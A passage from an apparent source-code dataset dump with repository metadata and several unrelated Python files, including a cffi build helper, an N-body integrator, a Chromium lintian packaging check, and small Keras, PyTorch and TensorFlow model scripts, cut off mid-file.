] | 3 | 2019-06-22T14:16:57.000Z | 2021-12-29T22:04:42.000Z | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import sys
from distutils.ccompiler import new_compiler
from distutils.dist import Distribution
from cffi import FFI
def build_ffi_for_binding(module_name, module_prefix, modules, libraries=[],
extra_compile_args=[], extra_link_args=[]):
"""
Modules listed in ``modules`` should have the following attributes:
* ``INCLUDES``: A string containing C includes.
* ``TYPES``: A string containing C declarations for types.
* ``FUNCTIONS``: A string containing C declarations for functions.
* ``MACROS``: A string containing C declarations for any macros.
* ``CUSTOMIZATIONS``: A string containing arbitrary top-level C code, this
can be used to do things like test for a define and provide an
alternate implementation based on that.
"""
types = []
includes = []
functions = []
macros = []
customizations = []
for name in modules:
__import__(module_prefix + name)
module = sys.modules[module_prefix + name]
types.append(module.TYPES)
macros.append(module.MACROS)
functions.append(module.FUNCTIONS)
includes.append(module.INCLUDES)
customizations.append(module.CUSTOMIZATIONS)
# We include functions here so that if we got any of their definitions
# wrong, the underlying C compiler will explode. In C you are allowed
# to re-declare a function if it has the same signature. That is:
# int foo(int);
# int foo(int);
# is legal, but the following will fail to compile:
# int foo(int);
# int foo(short);
#
# XXX <arigo> No, it is a bad idea. OpenSSL itself tends to tweak
# the definitions, like adding a 'const' (see issue #2575). Every
# time they do so, it makes a gratuitous break in this code. It is
# better to rely on the C compiler for that, which is a little bit
# more flexible. That's the point of set_source(). We can still
# re-enable the line ``#functions +`` below to get the original
# behavior. (I would enable it during tests, but I don't find any
# custom test at all..??)
#
verify_source = "\n".join(
includes +
#functions +
customizations
)
ffi = build_ffi(
module_name,
cdef_source="\n".join(types + functions + macros),
verify_source=verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def compiler_type():
"""
Gets the compiler type from distutils. On Windows with MSVC it will be
"msvc". On OS X and linux it is "unix".
"""
dist = Distribution()
dist.parse_config_files()
cmd = dist.get_command_obj('build')
cmd.ensure_finalized()
compiler = new_compiler(compiler=cmd.compiler)
return compiler.compiler_type
| 33.900901 | 79 | 0.662503 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import sys
from distutils.ccompiler import new_compiler
from distutils.dist import Distribution
from cffi import FFI
def build_ffi_for_binding(module_name, module_prefix, modules, libraries=[],
extra_compile_args=[], extra_link_args=[]):
"""
Modules listed in ``modules`` should have the following attributes:
* ``INCLUDES``: A string containing C includes.
* ``TYPES``: A string containing C declarations for types.
* ``FUNCTIONS``: A string containing C declarations for functions.
* ``MACROS``: A string containing C declarations for any macros.
* ``CUSTOMIZATIONS``: A string containing arbitrary top-level C code, this
can be used to do things like test for a define and provide an
alternate implementation based on that.
"""
types = []
includes = []
functions = []
macros = []
customizations = []
for name in modules:
__import__(module_prefix + name)
module = sys.modules[module_prefix + name]
types.append(module.TYPES)
macros.append(module.MACROS)
functions.append(module.FUNCTIONS)
includes.append(module.INCLUDES)
customizations.append(module.CUSTOMIZATIONS)
# We include functions here so that if we got any of their definitions
# wrong, the underlying C compiler will explode. In C you are allowed
# to re-declare a function if it has the same signature. That is:
# int foo(int);
# int foo(int);
# is legal, but the following will fail to compile:
# int foo(int);
# int foo(short);
#
# XXX <arigo> No, it is a bad idea. OpenSSL itself tends to tweak
# the definitions, like adding a 'const' (see issue #2575). Every
# time they do so, it makes a gratuitous break in this code. It is
# better to rely on the C compiler for that, which is a little bit
# more flexible. That's the point of set_source(). We can still
# re-enable the line ``#functions +`` below to get the original
# behavior. (I would enable it during tests, but I don't find any
# custom test at all..??)
#
verify_source = "\n".join(
includes +
#functions +
customizations
)
ffi = build_ffi(
module_name,
cdef_source="\n".join(types + functions + macros),
verify_source=verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def build_ffi(module_name, cdef_source, verify_source, libraries=[],
extra_compile_args=[], extra_link_args=[]):
ffi = FFI()
ffi.cdef(cdef_source)
ffi.set_source(
module_name,
verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def extra_link_args(compiler_type):
if compiler_type == 'msvc':
# Enable NX and ASLR for Windows builds on MSVC. These are enabled by
# default on Python 3.3+ but not on 2.x.
return ['/NXCOMPAT', '/DYNAMICBASE']
else:
return []
def compiler_type():
"""
Gets the compiler type from distutils. On Windows with MSVC it will be
"msvc". On OS X and linux it is "unix".
"""
dist = Distribution()
dist.parse_config_files()
cmd = dist.get_command_obj('build')
cmd.ensure_finalized()
compiler = new_compiler(compiler=cmd.compiler)
return compiler.compiler_type
| 595 | 0 | 46 |
1aee3f2ab511244210373f62c8dcdbdfdb567918 | 3,531 | py | Python | tupan/integrator/sakura.py | ggf84/tupan | 67d3aa103d77248a04e8f112930ba7bdb55024b2 | [
"MIT"
] | 1 | 2016-06-12T19:43:51.000Z | 2016-06-12T19:43:51.000Z | tupan/integrator/sakura.py | ggf84/tupan | 67d3aa103d77248a04e8f112930ba7bdb55024b2 | [
"MIT"
] | 1 | 2021-09-24T13:28:57.000Z | 2021-09-24T13:28:57.000Z | tupan/integrator/sakura.py | ggf84/tupan | 67d3aa103d77248a04e8f112930ba7bdb55024b2 | [
"MIT"
] | 3 | 2015-11-03T15:35:31.000Z | 2021-03-02T17:41:27.000Z | # -*- coding: utf-8 -*-
#
"""
TODO.
"""
from __future__ import print_function, division
import logging
from ..integrator import Base
from ..lib import extensions
from ..lib.utils.timing import decallmethods, timings
__all__ = ["Sakura"]
logger = logging.getLogger(__name__)
def sakura_step(ps, tau):
"""
"""
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
extensions.sakura.calc(ps, ps, tau/2, -1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
extensions.sakura.calc(ps, ps, tau/2, 1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
return ps
@decallmethods(timings)
class Sakura(Base):
"""
"""
PROVIDED_METHODS = ['sakura', 'asakura',
]
def __init__(self, eta, time, ps, method, **kwargs):
"""
"""
super(Sakura, self).__init__(eta, time, ps, **kwargs)
self.method = method
self.e0 = None
def initialize(self, t_end):
"""
"""
logger.info("Initializing '%s' integrator.",
self.method)
ps = self.ps
if self.reporter:
self.reporter.diagnostic_report(ps)
if self.dumpper:
self.dumpper.dump_worldline(ps)
if self.viewer:
self.viewer.show_event(ps)
self.is_initialized = True
def finalize(self, t_end):
"""
"""
logger.info("Finalizing '%s' integrator.",
self.method)
ps = self.ps
if self.viewer:
self.viewer.show_event(ps)
self.viewer.enter_main_loop()
def get_sakura_tstep(self, ps, eta, tau):
"""
"""
ps.set_tstep(ps, eta)
iw2_a = (eta/ps.tstep)**2
iw2_b = (eta/ps.tstepij)**2
diw2 = (iw2_a - iw2_b)
w2_sakura = diw2.max()
dt_sakura = eta/(1 + w2_sakura)**0.5
ps.tstep[...] = dt_sakura
min_bts = self.get_min_block_tstep(ps, tau)
return min_bts
def do_step(self, ps, tau):
"""
"""
# p0 = p.copy()
# if self.e0 is None:
# self.e0 = p0.kinetic_energy + p0.potential_energy
# de = [1]
# tol = tau**2
# nsteps = 1
#
# while abs(de[0]) > tol:
# p = p0.copy()
# dt = tau / nsteps
# for i in range(nsteps):
# p = sakura_step(p, dt)
# e1 = p.kinetic_energy + p.potential_energy
# de[0] = e1/self.e0 - 1
# if abs(de[0]) > tol:
## nsteps += (nsteps+1)//2
# nsteps *= 2
## print(nsteps, de, tol)
# break
if "asakura" in self.method:
tau = self.get_sakura_tstep(ps, self.eta, tau)
ps = sakura_step(ps, tau)
type(ps).t_curr += tau
ps.tstep[...] = tau
ps.time += tau
ps.nstep += 1
if self.dumpper:
slc = ps.time % (self.dump_freq * tau) == 0
if any(slc):
self.wl.append(ps[slc])
if self.viewer:
slc = ps.time % (self.gl_freq * tau) == 0
if any(slc):
self.viewer.show_event(ps[slc])
return ps
########## end of file ##########
| 21.662577 | 62 | 0.481167 | # -*- coding: utf-8 -*-
#
"""
TODO.
"""
from __future__ import print_function, division
import logging
from ..integrator import Base
from ..lib import extensions
from ..lib.utils.timing import decallmethods, timings
__all__ = ["Sakura"]
logger = logging.getLogger(__name__)
def sakura_step(ps, tau):
"""
"""
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
extensions.sakura.calc(ps, ps, tau/2, -1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
extensions.sakura.calc(ps, ps, tau/2, 1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
return ps
@decallmethods(timings)
class Sakura(Base):
"""
"""
PROVIDED_METHODS = ['sakura', 'asakura',
]
def __init__(self, eta, time, ps, method, **kwargs):
"""
"""
super(Sakura, self).__init__(eta, time, ps, **kwargs)
self.method = method
self.e0 = None
def initialize(self, t_end):
"""
"""
logger.info("Initializing '%s' integrator.",
self.method)
ps = self.ps
if self.reporter:
self.reporter.diagnostic_report(ps)
if self.dumpper:
self.dumpper.dump_worldline(ps)
if self.viewer:
self.viewer.show_event(ps)
self.is_initialized = True
def finalize(self, t_end):
"""
"""
logger.info("Finalizing '%s' integrator.",
self.method)
ps = self.ps
if self.viewer:
self.viewer.show_event(ps)
self.viewer.enter_main_loop()
def get_sakura_tstep(self, ps, eta, tau):
"""
"""
ps.set_tstep(ps, eta)
iw2_a = (eta/ps.tstep)**2
iw2_b = (eta/ps.tstepij)**2
diw2 = (iw2_a - iw2_b)
w2_sakura = diw2.max()
dt_sakura = eta/(1 + w2_sakura)**0.5
ps.tstep[...] = dt_sakura
min_bts = self.get_min_block_tstep(ps, tau)
return min_bts
def do_step(self, ps, tau):
"""
"""
# p0 = p.copy()
# if self.e0 is None:
# self.e0 = p0.kinetic_energy + p0.potential_energy
# de = [1]
# tol = tau**2
# nsteps = 1
#
# while abs(de[0]) > tol:
# p = p0.copy()
# dt = tau / nsteps
# for i in range(nsteps):
# p = sakura_step(p, dt)
# e1 = p.kinetic_energy + p.potential_energy
# de[0] = e1/self.e0 - 1
# if abs(de[0]) > tol:
## nsteps += (nsteps+1)//2
# nsteps *= 2
## print(nsteps, de, tol)
# break
if "asakura" in self.method:
tau = self.get_sakura_tstep(ps, self.eta, tau)
ps = sakura_step(ps, tau)
type(ps).t_curr += tau
ps.tstep[...] = tau
ps.time += tau
ps.nstep += 1
if self.dumpper:
slc = ps.time % (self.dump_freq * tau) == 0
if any(slc):
self.wl.append(ps[slc])
if self.viewer:
slc = ps.time % (self.gl_freq * tau) == 0
if any(slc):
self.viewer.show_event(ps[slc])
return ps
########## end of file ##########
| 0 | 0 | 0 |
03380b9fc4bc2791f31e4a4be7f09ddd23a207d8 | 1,238 | py | Python | src/python/serif/model/impl/event_mention/eat_event_mention_model.py | BBN-E/text-open | c508f6caeaa51a43cdb0bc27d8ed77e5750fdda9 | [
"Apache-2.0"
] | 2 | 2022-03-24T14:37:51.000Z | 2022-03-24T19:56:45.000Z | src/python/serif/model/impl/event_mention/eat_event_mention_model.py | BBN-E/text-open | c508f6caeaa51a43cdb0bc27d8ed77e5750fdda9 | [
"Apache-2.0"
] | null | null | null | src/python/serif/model/impl/event_mention/eat_event_mention_model.py | BBN-E/text-open | c508f6caeaa51a43cdb0bc27d8ed77e5750fdda9 | [
"Apache-2.0"
] | null | null | null | from serif.model.event_mention_model import EventMentionModel
# Modified from DummyEventMentionModel
| 38.6875 | 76 | 0.630048 | from serif.model.event_mention_model import EventMentionModel
# Modified from DummyEventMentionModel
class EatEventMentionModel(EventMentionModel):
def __init__(self,**kwargs):
super(EatEventMentionModel,self).__init__(**kwargs)
def get_event_mention_info(self, sentence):
# Create an EventMention whenever there is an FOOD
# mentioned in the same sentence as a DOG
tuples = []
event_type = 'EAT'
food_role = 'participant_food'
dog_role = 'participant_dog'
foods = [m for m in sentence.mention_set if m.entity_type == 'FOOD']
dogs = [m for m in sentence.mention_set if m.entity_type == 'DOG']
for food_mention in foods:
if len(dogs) == 0:
continue
for dog_mention in dogs:
food_argument_spec = (food_role, food_mention, 1.0)
dog_argument_spec = (dog_role, dog_mention, 1.0)
arg_specs = [food_argument_spec, dog_argument_spec]
anchor_node = food_mention.syn_node.head
event_mention_info = \
(event_type, anchor_node, 0.75, arg_specs)
tuples.append(event_mention_info)
return tuples
| 1,035 | 25 | 75 |
165f9269e37cdf991334a589b6a3a94353b51f85 | 1,401 | py | Python | chrome/installer/linux/debian/lint_package.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668 | 2015-01-01T01:57:10.000Z | 2022-03-31T23:33:32.000Z | chrome/installer/linux/debian/lint_package.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | chrome/installer/linux/debian/lint_package.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941 | 2015-01-02T11:32:21.000Z | 2022-03-31T16:35:46.000Z | #!/usr/bin/env python
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Performs some static analysis checks on Chrome debian packages
using lintian.
"""
import argparse
import os
import subprocess
SUPPRESSIONS = [
# Google Chrome is not software available on a distro by default,
# so installing to /opt is correct behavior.
'dir-or-file-in-opt',
# Distros usually don't like libraries to be statically linked
# into binaries because it's easier to push a security patch on a
# single package than to update many packages. Chromium
# statically links some libraries anyway.
'embedded-library',
# The setuid sandbox is a setuid binary.
'setuid-binary',
# Some nacl binaries are statically linked but don't have "static"
# in their name.
'statically-linked-binary',
# Build configurations with is_official_build=false don't compress
# the packages.
'uses-no-compression-for-data-tarball',
]
parser = argparse.ArgumentParser()
parser.add_argument('package', help='path/to/package.deb')
args = parser.parse_args()
package = os.path.abspath(args.package)
cmd = [
'lintian',
package,
'--no-tag-display-limit',
'--pedantic',
'--suppress-tags',
','.join(SUPPRESSIONS)
]
subprocess.check_call(cmd)
| 28.591837 | 72 | 0.710921 | #!/usr/bin/env python
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Performs some static analysis checks on Chrome debian packages
using lintian.
"""
import argparse
import os
import subprocess
SUPPRESSIONS = [
# Google Chrome is not software available on a distro by default,
# so installing to /opt is correct behavior.
'dir-or-file-in-opt',
# Distros usually don't like libraries to be statically linked
# into binaries because it's easier to push a security patch on a
# single package than to update many packages. Chromium
# statically links some libraries anyway.
'embedded-library',
# The setuid sandbox is a setuid binary.
'setuid-binary',
# Some nacl binaries are statically linked but don't have "static"
# in their name.
'statically-linked-binary',
# Build configurations with is_official_build=false don't compress
# the packages.
'uses-no-compression-for-data-tarball',
]
parser = argparse.ArgumentParser()
parser.add_argument('package', help='path/to/package.deb')
args = parser.parse_args()
package = os.path.abspath(args.package)
cmd = [
'lintian',
package,
'--no-tag-display-limit',
'--pedantic',
'--suppress-tags',
','.join(SUPPRESSIONS)
]
subprocess.check_call(cmd)
| 0 | 0 | 0 |
3394d0d604868b37054722470e6cda2033718cb5 | 898 | py | Python | scripts/mlp_functional_api.py | sanikamal/awesome-dl-examples | 1e7ef5fc879dd6c1c659bb74ba45963a036e9dcd | [
"MIT"
] | null | null | null | scripts/mlp_functional_api.py | sanikamal/awesome-dl-examples | 1e7ef5fc879dd6c1c659bb74ba45963a036e9dcd | [
"MIT"
] | null | null | null | scripts/mlp_functional_api.py | sanikamal/awesome-dl-examples | 1e7ef5fc879dd6c1c659bb74ba45963a036e9dcd | [
"MIT"
] | null | null | null | """
Multilayer Perceptron model for binary classification.
The model has 10 inputs, 3 hidden layers with 10, 20, and 10 neurons,and an output layer with 1 output.
Rectified linear activation functions are used in each hidden layer
and a sigmoid activation function is used in the output layer,for binary classification."""
import tensorflow as tf
# from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
visible = Input(shape=(10,))
hidden1 = Dense(10, activation= 'relu' )(visible)
hidden2 = Dense(20, activation= 'relu' )(hidden1)
hidden3 = Dense(10, activation= 'relu' )(hidden2)
output = Dense(1, activation= 'sigmoid' )(hidden3)
model = Model(inputs=visible, outputs=output)
# summarize layers
model.summary()
# plot graph
# plot_model(model, to_file= 'mlp_graph.png' )
| 35.92 | 103 | 0.771715 | """
Multilayer Perceptron model for binary classification.
The model has 10 inputs, 3 hidden layers with 10, 20, and 10 neurons,and an output layer with 1 output.
Rectified linear activation functions are used in each hidden layer
and a sigmoid activation function is used in the output layer,for binary classification."""
import tensorflow as tf
# from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
visible = Input(shape=(10,))
hidden1 = Dense(10, activation= 'relu' )(visible)
hidden2 = Dense(20, activation= 'relu' )(hidden1)
hidden3 = Dense(10, activation= 'relu' )(hidden2)
output = Dense(1, activation= 'sigmoid' )(hidden3)
model = Model(inputs=visible, outputs=output)
# summarize layers
model.summary()
# plot graph
# plot_model(model, to_file= 'mlp_graph.png' )
| 0 | 0 | 0 |
f8b325c42287a9461b7a0d381cfcfa2fe0c14536 | 764 | py | Python | src/scratch-scripts/feature-extraction.py | kanazashi-s/pytorch-faster-rcnn-from-scratch- | 4a482dcda30c10e609468251dd0222d27718b9b1 | [
"MIT"
] | null | null | null | src/scratch-scripts/feature-extraction.py | kanazashi-s/pytorch-faster-rcnn-from-scratch- | 4a482dcda30c10e609468251dd0222d27718b9b1 | [
"MIT"
] | null | null | null | src/scratch-scripts/feature-extraction.py | kanazashi-s/pytorch-faster-rcnn-from-scratch- | 4a482dcda30c10e609468251dd0222d27718b9b1 | [
"MIT"
] | null | null | null | #%%
# 画像・バウンディングボックス・ラベルのセットを準備する
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# VGG16を、バックボーンに使用する
# VGG16の出力特徴マップのサイズが 800//16 = 50 になるよう、小細工をする
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# 特徴量抽出器の完成
faster_rcnn_fe_extractor = nn.Sequential(*req_features) | 22.470588 | 94 | 0.683246 | #%%
# 画像・バウンディングボックス・ラベルのセットを準備する
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# VGG16を、バックボーンに使用する
# VGG16の出力特徴マップのサイズが 800//16 = 50 になるよう、小細工をする
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# 特徴量抽出器の完成
faster_rcnn_fe_extractor = nn.Sequential(*req_features) | 0 | 0 | 0 |
d6058fc0135c215b14d942d5fdc9670339794089 | 621 | py | Python | parserscripts/parsers/find_accession.py | nataliyah123/phageParser | bc05d76c23d37ee80ffa2bbf6e7e977341bab3ee | [
"MIT"
] | 65 | 2017-05-10T15:26:18.000Z | 2022-03-07T07:10:12.000Z | parserscripts/parsers/find_accession.py | nataliyah123/phageParser | bc05d76c23d37ee80ffa2bbf6e7e977341bab3ee | [
"MIT"
] | 143 | 2017-03-22T22:55:16.000Z | 2020-02-13T15:52:03.000Z | parserscripts/parsers/find_accession.py | nataliyah123/phageParser | bc05d76c23d37ee80ffa2bbf6e7e977341bab3ee | [
"MIT"
] | 44 | 2017-03-22T20:47:16.000Z | 2022-03-15T21:45:12.000Z | import csv
| 27 | 78 | 0.594203 | import csv
class PhageFinder:
PHAGE_NAME = 0
CLUSTER = 1
EXIST_IN_GENBANK = 4
ACCESSION = 5
def __init__(self, infile, **kwargs):
blast_file = open(infile, 'r')
self.reader = csv.reader(blast_file, dialect=csv.excel_tab)
def find_by_phage(self, phage, cluster):
for row in self.reader:
# check if phage exists
if phage in row[self.PHAGE_NAME] and cluster in row[self.CLUSTER]:
# check if exists in genbank
if 'True' in row[self.EXIST_IN_GENBANK]:
return row[self.ACCESSION]
return -1
| 457 | 129 | 23 |
63cf1de58478f20d0e49a8733ad3d5d780a783fb | 6,386 | py | Python | codes/python/3-neural_networks/convolutional-neural-network/cnn_cifar10.py | jswanglp/TensorFlow-Course | d40faf3f86af8edc3b8181e17d7101ab928a1135 | [
"MIT"
] | null | null | null | codes/python/3-neural_networks/convolutional-neural-network/cnn_cifar10.py | jswanglp/TensorFlow-Course | d40faf3f86af8edc3b8181e17d7101ab928a1135 | [
"MIT"
] | null | null | null | codes/python/3-neural_networks/convolutional-neural-network/cnn_cifar10.py | jswanglp/TensorFlow-Course | d40faf3f86af8edc3b8181e17d7101ab928a1135 | [
"MIT"
] | null | null | null | #@title datasets_tutorials(cifar-10) { display-mode: "both" }
# conding: utf-8
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# from functools import reduce
import tensorflow_datasets as tfds
import numpy as np
import time
# tf.logging.set_verbosity(tf.logging.ERROR)
if __name__ == '__main__':
# filepath = '/content/GoogleDrive/Python27/MNIST_data'
# # filepath = r'E:\Anaconda2\Programs\MNIST_data'
# mnist = input_data.read_data_sets(filepath, one_hot=True)
# mnist_train = tfds.load("mnist", split=tfds.Split.TRAIN)
mnist_train = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TRAIN, batch_size=-1))
imgs_train, labels_train = mnist_train['image'].reshape(-1, 3072) / 255., mnist_train['label']
# imgs_train, labels_train = tf.reshape(mnist_train['image'], shape=[-1, 784]), tf.one_hot(mnist_train['label'], depth=10)
mnist_test = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TEST, batch_size=-1))
# mnist_test = tfds.load("mnist", split=tfds.Split.TEST, batch_size=-1)
imgs_test, labels_test = mnist_test['image'].reshape(-1, 3072) / 255., mnist_test['label']
learning_rate = 3e-4 #@param {type:"number"}
batch_size = 256 #@param {type:"integer"}
num_epochs = 80 #@param {type:"integer"}
graph = tf.Graph()
with graph.as_default():
x = tf.placeholder(tf.float32, shape=[None, 3072])
y_p = tf.placeholder(tf.int64, shape=[None, ])
y = tf.one_hot(y_p, depth=10)
keep_pro = tf.placeholder(tf.float32)
x_imgs = tf.reshape(x, shape=[-1, 32, 32, 3], name='input_images')
w_1 = tf.Variable(tf.truncated_normal([3, 3, 3, 64], stddev=0.1), name='weights_conv1')
b_1 = tf.Variable(tf.constant(0.1, shape=[64]), name='bias_conv1')
h_conv1 = tf.nn.relu(tf.nn.conv2d(x_imgs, w_1, strides=[1, 1, 1, 1], padding='SAME') + b_1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
w_2 = tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.1), name='weights_conv2')
b_2 = tf.Variable(tf.constant(0.1, shape=[128]), name='bias_conv2')
h_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, w_2, strides=[1, 1, 1, 1], padding='SAME') + b_2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# layer_shape = h_pool2.get_shape().as_list()
# num_f = reduce(lambda a,b:a * b, layer_shape[1:])
# h_pool2_fla = tf.reshape(h_pool2, shape=[-1, num_f])
h_pool2_fla = tf.layers.flatten(h_pool2)
num_f = h_pool2_fla.get_shape().as_list()[-1]
w_fc1 = tf.Variable(tf.truncated_normal([num_f, 256], stddev=0.1), name='weights_fc1')
b_fc1 = tf.Variable(tf.constant(0.1, shape=[256]), name='bias_fc1')
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_fla, w_fc1) + b_fc1)
h_drop1 = tf.nn.dropout(h_fc1, keep_prob=keep_pro, name='Dropout')
w_fc2 = tf.Variable(tf.truncated_normal([256, 10], stddev=0.1), name='weights_fc2')
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]), name='bias_fc2')
h_fc2 = tf.matmul(h_drop1, w_fc2) + b_fc2
# tf.add_to_collection(tf.GraphKeys.WEIGHTS, w_fc1)
# regularizer = tf.contrib.layers.l2_regularizer(scale=1500./60000)
# reg_tem = tf.contrib.layers.apply_regularization(regularizer)
with tf.name_scope('loss'):
entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2))
# entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2) + reg_tem)
with tf.name_scope('accuracy'):
prediction = tf.cast(tf.equal(tf.arg_max(h_fc2, 1), tf.argmax(y, 1)), "float")
accuracy = tf.reduce_mean(prediction)
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(entropy_loss)
sess = tf.Session()
with sess.as_default():
sess.run(tf.global_variables_initializer())
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
for num in range(num_epochs):
# batch = mnist.train.next_batch(batch_size)
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
# imgs_train, labels_train = batch_imgs.reshape(-1, 784), batch_labels
imgs_data = np.c_[imgs_train, labels_train]
np.random.shuffle(imgs_data)
num_batchs = imgs_train.shape[0] // batch_size
start = time.time()
for num_ep in range(num_batchs):
# start = time.time()
imgs_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size, :-1]
labels_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size,-1]
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_batch,
y_p: labels_batch,
keep_pro: 0.5})
end = time.time()
acc *= 100
num_e = str(num + 1)
print_list = [num_e, loss, acc]
print("Epoch {0[0]}, train_loss is {0[1]:.4f}, accuracy is {0[2]:.2f}%.".format(print_list))
print("Running time is {0:.2f}s.".format(end-start))
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_test,
y_p: labels_test,
keep_pro: 1.})
acc *= 100
print_list = [loss, acc]
print("Test_loss is {0[0]:.4f}, accuracy is {0[1]:.2f}%.".format(print_list))
sess.close() | 54.118644 | 126 | 0.595521 | #@title datasets_tutorials(cifar-10) { display-mode: "both" }
# conding: utf-8
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# from functools import reduce
import tensorflow_datasets as tfds
import numpy as np
import time
def format_tran(tfdata, batch_size=32):
batch_tfdata = tfdata.shuffle(1).batch(batch_size)
batch_imgs = tfds.as_numpy(batch_tfdata).__next__()['image']
batch_labels = tfds.as_numpy(batch_tfdata).__next__()['label']
return batch_imgs, batch_labels
# tf.logging.set_verbosity(tf.logging.ERROR)
if __name__ == '__main__':
# filepath = '/content/GoogleDrive/Python27/MNIST_data'
# # filepath = r'E:\Anaconda2\Programs\MNIST_data'
# mnist = input_data.read_data_sets(filepath, one_hot=True)
# mnist_train = tfds.load("mnist", split=tfds.Split.TRAIN)
mnist_train = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TRAIN, batch_size=-1))
imgs_train, labels_train = mnist_train['image'].reshape(-1, 3072) / 255., mnist_train['label']
# imgs_train, labels_train = tf.reshape(mnist_train['image'], shape=[-1, 784]), tf.one_hot(mnist_train['label'], depth=10)
mnist_test = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TEST, batch_size=-1))
# mnist_test = tfds.load("mnist", split=tfds.Split.TEST, batch_size=-1)
imgs_test, labels_test = mnist_test['image'].reshape(-1, 3072) / 255., mnist_test['label']
learning_rate = 3e-4 #@param {type:"number"}
batch_size = 256 #@param {type:"integer"}
num_epochs = 80 #@param {type:"integer"}
graph = tf.Graph()
with graph.as_default():
x = tf.placeholder(tf.float32, shape=[None, 3072])
y_p = tf.placeholder(tf.int64, shape=[None, ])
y = tf.one_hot(y_p, depth=10)
keep_pro = tf.placeholder(tf.float32)
x_imgs = tf.reshape(x, shape=[-1, 32, 32, 3], name='input_images')
w_1 = tf.Variable(tf.truncated_normal([3, 3, 3, 64], stddev=0.1), name='weights_conv1')
b_1 = tf.Variable(tf.constant(0.1, shape=[64]), name='bias_conv1')
